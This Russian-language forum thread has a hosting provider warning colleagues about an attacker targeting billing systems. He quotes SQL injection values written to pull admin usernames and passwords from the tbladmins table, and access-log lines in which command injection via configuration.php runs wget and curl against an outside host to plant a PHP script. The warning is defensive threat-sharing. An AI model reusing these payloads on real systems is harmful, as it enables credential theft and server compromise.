1. Рады видеть Вас на русскоязычном форуме TeamSpeak!

    У нас Вы можете скачать последнюю версию:

    Перед регистрацией рекомендуем ознакомиться

    с Правилами форума.

    Присоединяйтесь! Учите и обучайтесь!

    Скрыть объявление
  2. Новая группа "Новичок" на нашем форуме!

    Новые пользователи будут попадать в группу "Новичок".

    Это сделано для того чтобы "Новички" ознакомились с форумом, так как в большинстве случаев проблема с которой вы хотите обратиться уже обсуждалась.

    Перейти в тему обсуждения
    Быстрый переход в группу Пользователь
  3. VPS/VDS и дедикейт сервера в аренду с DDoS защитой

    • Низкий пинг
    • Действующий SLA
    • Рублевые цены без привязки к курсу валют

    Бесплатный тестовый период VPS-OpenVZ

    Попробовать

Хостинг Хостерам тимспик

Тема в разделе "Вопросы по TeamSpeak 3", создана пользователем darkangel66Icon, 18 июл 2015.

  1. darkangel66

    darkangel66Icon TEAM-VOICE.COM ATHP Премиум Пользователь

    Регистрация:
    12.06.12
    Сообщения:
    417
    Симпатии:
    169
    Баллы:
    335
    Коллеги уведомляю вас, появился нехороший человек осуществляющий взлом биллинговых систем
    IP адрес злоумышленника
    167.114.157.33
    методы взлома: попытка инжекта:
    Client Profile Modified - Company Name: ' BN-Family ' to ' BN-IDB ', Address 1: 'dm' to 'AES_ENCRYPT(1,1), address1= (SELECT MIN(username) FROM tbladmins)', Address 2: 'dm' to 'AES_ENCRYPT(1,1), address2= (SELECT MIN(password) FROM tbladmins)', Postcode: '404403' to 'dm', Default Payment Method: '' to ''

    так же попытки залить свой скрипт к вам на хостинг с адреса
    http://azzatssins.yu.tl/*******
    для этого использует следующий метод:
    167.114.157.33 - - [18/Jul/2015:12:35:13 +0300] "GET /configuration.php?x=wget%20-c%20www.azzatssins.yu.tl/***s.zip HTTP/1.1" 200 -
    167.114.157.33 - - [18/Jul/2015:12:35:14 +0300] "GET /configuration.php?x=mv%20c****s.zip%***s.php HTTP/1.1" 200 -
    167.114.157.33 - - [18/Jul/2015:12:35:14 +0300] "GET /configuration.php?x=curl%20-O%20www.azzatssins.yu.tl/f****ip.zip HTTP/1.1" 200 -
    167.114.157.33 - - [18/Jul/2015:12:35:14 +0300] "GET /configuration.php?x=mv%2*rs.zip.zip%2*NS.php HTTP/1.1" 200 -
    167.114.157.33 - - [18/Jul/2015:12:35:15 +0300] "GET /configuration.php?x=mv%*ns.zip%20*ers.php HTTP/1.1" 200 -

    я стянул с его хоста тот код который он пытается залить и проанализировал его, суть в том что он сливает всю sql базу

    предупрежден значит вооружен!
    В моем случае человеку ничего не удалось , надеюсь вы так же успеете принять меры дабы не стать жертвой злоумышленника.
     
    • Нравится Нравится x 3
  2. Zaur

    ZaurIcon s4r.pw Администратор Знаток

    Регистрация:
    27.08.13
    Сообщения:
    764
    Симпатии:
    215
    Баллы:
    437
    Ваша биллинговая система самописная или приобретенная?
     
  3. darkangel66

    darkangel66Icon TEAM-VOICE.COM ATHP Премиум Пользователь

    Регистрация:
    12.06.12
    Сообщения:
    417
    Симпатии:
    169
    Баллы:
    335
    Приобретенная, багрепорт разработчикам отправлен.
     
Загрузка...